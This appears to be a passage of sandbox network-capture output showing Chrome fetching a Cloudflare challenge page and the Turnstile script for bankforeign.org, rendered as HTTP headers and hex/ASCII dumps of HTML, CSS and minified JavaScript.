                                                            2024-02-01 20:38:11 UTC1353INHTTP/1.1 403 Forbidden
                                                            Date: Thu, 01 Feb 2024 20:38:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 13888
                                                            Connection: close
                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Resource-Policy: same-origin
                                                            Origin-Agent-Cluster: ?1
                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            Referrer-Policy: same-origin
                                                            X-Frame-Options: SAMEORIGIN
                                                            cf-mitigated: challenge
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jyxsmIbveDtJWYyDhPKro74nUJZ8nxWFUBrskNzmXJ7vLWVXpZCIx4or31reTfVs4serxkhASInJeLvd%2F3xnMUYhnHYEKU4du0Z194H5FuDsOuMuZF5nvnZlpfI6K3Hb1Yo%3D"}],"group":"cf-nel","max_age":604800}
                                                            2024-02-01 20:38:11 UTC149INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 65 63 66 66 32 32 63 39 36 35 37 38 63 38 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84ecff22c96578c8-ATLalt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:11 UTC1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45
                                                            Data Ascii: MiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTE
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 68 74 2d 6d 6f 64 65 3b 7d 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 26 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65
                                                            Data Ascii: ht-mode;}}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3;&:hover{text-decoration:underline;color:#ee730a}}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2re
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e
                                                            Data Ascii: 40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 66 66 7d 7d 2e 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 7b 26 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67
                                                            Data Ascii: ff}}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.clearfix{&:after{display:table;clear:both;content:""}.column{float:left;padding-rig
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 2c 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74
                                                            Data Ascii: ,.main-wrapper{display:block}}</style><meta http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-t
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 4c 56 37 76 55 47 45 4a 50 56 79 6e 57 69 69 76 6f 44 50 5a 61 79 73 30 62 64 59 74 61 70 69 5a 67 63 4e 62 6f 77 66 56 4a 49 49 42 4e 4d 39 6f 6e 78 32 42 74 55 57 48 52 55 45 7a 51 5a 31 79 6e 6a 73 37 49 70 78 38 38 56 4b 62 37 6a 73 51 63 6c 35 69 4b 4f 78 37 78 4b 67 69 78 4d 55 35 4f 54 61 66 43 67 33 6b 6b 30 2d 62 44 79 78 6d 52 48 72 4a 39 32 7a 4e 68 4f 73 46 4f 35 67 58 35 68 47 52 6f 58 6e 52 36 65 31 4b 45 79 6a 4b 59 39 7a 6b 31 55 52 34 76 45 78 50 2d 4a 73 6d 37 70 55 36 48 4c 4f 52 39 4b 7a 50 2d 6e 4c 6b 61 72 53 38 52 35 4d 43 71 79 77 73 36 79 36 32 42 74 56 36 73 6d 36 55 42 33 44 51 4a 4f 4c 4b 39 58 64 46 5a 49 78 6e 4f 6e 7a 77 2d 6f 55 4f 59 6f 74 74 5f 46 56 4a 4a 62 52 61 47 31 77 4a 75 54 6d 75 64 4b 54 38 2d 77 30 66 5f 76 35
                                                            Data Ascii: LV7vUGEJPVynWiivoDPZays0bdYtapiZgcNbowfVJIIBNM9onx2BtUWHRUEzQZ1ynjs7Ipx88VKb7jsQcl5iKOx7xKgixMU5OTafCg3kk0-bDyxmRHrJ92zNhOsFO5gX5hGRoXnR6e1KEyjKY9zk1UR4vExP-Jsm7pU6HLOR9KzP-nLkarS8R5MCqyws6y62BtV6sm6UB3DQJOLK9XdFZIxnOnzw-oUOYott_FVJJbRaG1wJuTmudKT8-w0f_v5
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 37 42 52 67 78 44 49 6d 31 6b 4c 4d 30 38 52 58 72 62 72 70 59 55 63 56 32 41 59 36 44 5a 44 6d 42 4a 4c 4d 51 77 35 61 6e 45 77 35 47 61 48 54 55 49 56 68 44 4d 33 63 6e 41 56 6a 55 47 54 49 78 62 33 52 4b 6a 4c 45 2d 5f 64 67 5f 42 4e 4f 2d 42 53 67 51 53 66 31 6d 4d 4b 39 51 46 62 72 43 50 65 64 51 56 52 66 55 6f 4f 32 41 69 6e 4b 32 47 4b 49 6d 78 36 70 4f 43 7a 71 4e 43 45 64 73 62 76 4c 63 6a 73 6c 6a 63 49 42 39 33 6d 55 48 69 67 48 57 53 64 51 57 78 70 66 53 35 39 66 6e 64 74 53 6a 38 78 37 79 5f 76 66 52 62 53 41 4c 6d 50 6f 56 75 4f 35 57 6e 67 56 69 75 52 5f 67 73 6a 4e 73 7a 77 77 64 44 68 58 50 66 59 58 71 41 57 7a 6e 77 56 74 4f 4f 56 71 4b 58 63 34 66 76 6a 74 63 57 45 71 6e 47 35 58 6e 2d 37 76 30 74 31 78 48 51 4b 76 64 72 62 59 45 67 69
                                                            Data Ascii: 7BRgxDIm1kLM08RXrbrpYUcV2AY6DZDmBJLMQw5anEw5GaHTUIVhDM3cnAVjUGTIxb3RKjLE-_dg_BNO-BSgQSf1mMK9QFbrCPedQVRfUoO2AinK2GKImx6pOCzqNCEdsbvLcjsljcIB93mUHigHWSdQWxpfS59fndtSj8x7y_vfRbSALmPoVuO5WngViuR_gsjNszwwdDhXPfYXqAWznwVtOOVqKXc4fvjtcWEqnG5Xn-7v0t1xHQKvdrbYEgi
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 45 49 56 58 69 46 44 77 54 44 48 79 78 4d 77 43 72 71 68 34 73 6d 49 45 4c 70 71 30 67 32 55 5f 69 75 37 48 58 78 64 65 35 33 43 49 42 46 61 72 4a 71 36 66 44 4a 49 32 6a 35 66 71 6f 4f 62 2d 51 4a 62 68 73 7a 59 6f 45 6d 4f 74 6d 37 59 42 78 76 61 50 55 32 2d 6a 41 6f 6e 44 69 76 42 41 38 37 64 65 52 61 76 73 42 63 44 54 70 35 64 47 34 7a 6c 4c 4a 4b 73 4d 74 69 37 64 4f 37 4e 33 33 42 76 52 30 45 4f 6b 6a 31 77 31 70 65 2d 41 45 55 70 33 78 4f 31 6e 57 69 66 33 71 6b 55 59 37 39 50 30 72 4d 6c 6f 7a 58 57 41 4a 65 49 53 4f 30 42 30 66 56 52 6c 37 59 6a 6f 39 6d 74 6e 74 48 6e 61 34 4a 55 61 6f 67 5f 4b 4a 7a 51 63 4a 31 31 33 4b 54 5a 67 6d 63 37 4b 46 69 76 5a 4c 5f 57 6f 37 79 53 58 37 7a 37 49 71 2d 72 6d 6f 6b 75 52 69 50 73 47 76 4f 53 44 56 7a 56
                                                            Data Ascii: EIVXiFDwTDHyxMwCrqh4smIELpq0g2U_iu7HXxde53CIBFarJq6fDJI2j5fqoOb-QJbhszYoEmOtm7YBxvaPU2-jAonDivBA87deRavsBcDTp5dG4zlLJKsMti7dO7N33BvR0EOkj1w1pe-AEUp3xO1nWif3qkUY79P0rMlozXWAJeISO0B0fVRl7Yjo9mtntHna4JUaog_KJzQcJ113KTZgmc7KFivZL_Wo7ySX7z7Iq-rmokuRiPsGvOSDVzV


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.449746104.17.2.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC578OUTGET /turnstile/v0/b/24864818/api.js?onload=rmxH0&render=explicit HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Origin: https://bankforeign.org
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: script
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:11 UTC296INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:11 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 38314
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: max-age=31536000
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff22db2ab032-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:11 UTC1073INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 2c 72 2c 74 2c 6f 2c 66 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 73 5d 28 6d 29 2c 67 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 75 29 7b 74 28 75 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 67 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 67 29 2e 74 68 65 6e 28 6f 2c 66 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 66 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function ut(e,r,t,o,f,s,m){try{var p=e[s](m),g=p.value}catch(u){t(u);return}p.done?r(g):Promise.resolve(g).then(o,f)}function lt(e){return function(){var r=this,t=arguments;return new Promise(function(o,f){var s=e.apply(r,t);funct
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 21 31 2c 6d 2c 70 3b 74 72 79 7b 66 6f 72 28 74 3d 74 2e 63 61 6c 6c 28 65 29 3b 21 28 66 3d 28 6d 3d 74 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 6d 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 66 3d 21 30 29 3b 7d 63 61 74 63 68 28 67 29 7b 73 3d 21 30 2c 70 3d 67 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 66 26 26 74 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 74 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 70 7d 7d 72 65 74 75 72 6e 20 6f 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                            Data Ascii: !1,m,p;try{for(t=t.call(e);!(f=(m=t.next()).done)&&(o.push(m.value),!(r&&o.length===r));f=!0);}catch(g){s=!0,p=g}finally{try{!f&&t.return!=null&&t.return()}finally{if(s)throw p}}return o}}function dt(){throw new TypeError("Invalid attempt to destructure n
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 74 75 72 6e 29 26 26 73 2e 63 61 6c 6c 28 66 29 2c 30 29 3a 66 2e 6e 65 78 74 29 26 26 21 28 73 3d 73 2e 63 61 6c 6c 28 66 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 73 3b 73 77 69 74 63 68 28 66 3d 30 2c 73 26 26 28 75 3d 5b 75 5b 30 5d 26 32 2c 73 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 73 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 74 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 74 2e 6c 61 62 65 6c 2b 2b 2c 66 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 74 2e 6f 70 73 2e 70 6f 70 28 29 2c 74 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                            Data Ascii: turn)&&s.call(f),0):f.next)&&!(s=s.call(f,u[1])).done)return s;switch(f=0,s&&(u=[u[0]&2,s.value]),u[0]){case 0:case 1:s=u;break;case 4:return t.label++,{value:u[1],done:!1};case 5:t.label++,f=u[1],u=[0];continue;case 7:u=t.ops.pop(),t.trys.pop();continue;
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 75 74 65 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 44 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 4b 45 45 50 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 44 65 7c 7c 28 44 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 29 7b 72 65 74 75 72 6e 20 48 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 46 65 28 65 29 7b
                                                            Data Ascii: ute"})($||($={}));var De;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.KEEPS_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(De||(De={}));function Ue(e){return H(["auto","dark","light"],e)}function Fe(e){
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 47 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 66 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 66 2c 6f 7d 2c 47 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 2c 72 29 7b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 72 26 26 72 2e 70 72 6f 74
                                                            Data Ascii: )}function G(e,r){return G=Object.setPrototypeOf||function(o,f){return o.__proto__=f,o},G(e,r)}function Ot(e,r){if(typeof r!="function"&&r!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(r&&r.prot
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 47 28 66 2c 6f 29 7d 2c 53 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 26 26 28 6b 28 72 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 72 3a 77 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 74 28 65 29 7b 76 61 72 20 72 3d 54 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 4a 28 65 29 2c 66 3b 69 66 28 72 29 7b 76 61 72 20 73 3d 4a 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 66 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 73 29
                                                            Data Ascii: umerable:!1,writable:!0,configurable:!0}}),G(f,o)},Se(e)}function Nt(e,r){return r&&(k(r)==="object"||typeof r=="function")?r:we(e)}function kt(e){var r=Te();return function(){var o=J(e),f;if(r){var s=J(this).constructor;f=Reflect.construct(o,arguments,s)
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 72 79 7b 66 6f 72 28 76 61 72 20 73 3d 65 2e 77 69 64 67 65 74 4d 61 70 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 6d 3b 21 28 74 3d 28 6d 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 70 3d 68 65 28 6d 2e 76 61 6c 75 65 2c 32 29 2c 67 3d 70 5b 30 5d 2c 75 3d 70 5b 31 5d 2c 78 3b 75 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 2c 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 3d 3d 30 26 26 28 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 29 3b 76 61 72 20 77 3d 58 28 67 29 3b 69 66 28 21 77 29 7b 75 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e
                                                            Data Ascii: ry{for(var s=e.widgetMap[Symbol.iterator](),m;!(t=(m=s.next()).done);t=!0){var p=he(m.value,2),g=p[0],u=p[1],x;u.watchcat.seq=e.watchCatSeq,u.watchcat.lastAckedSeq===0&&(u.watchcat.lastAckedSeq=e.watchCatSeq);var w=X(g);if(!w){u.watchcat.missingWidgetWarn
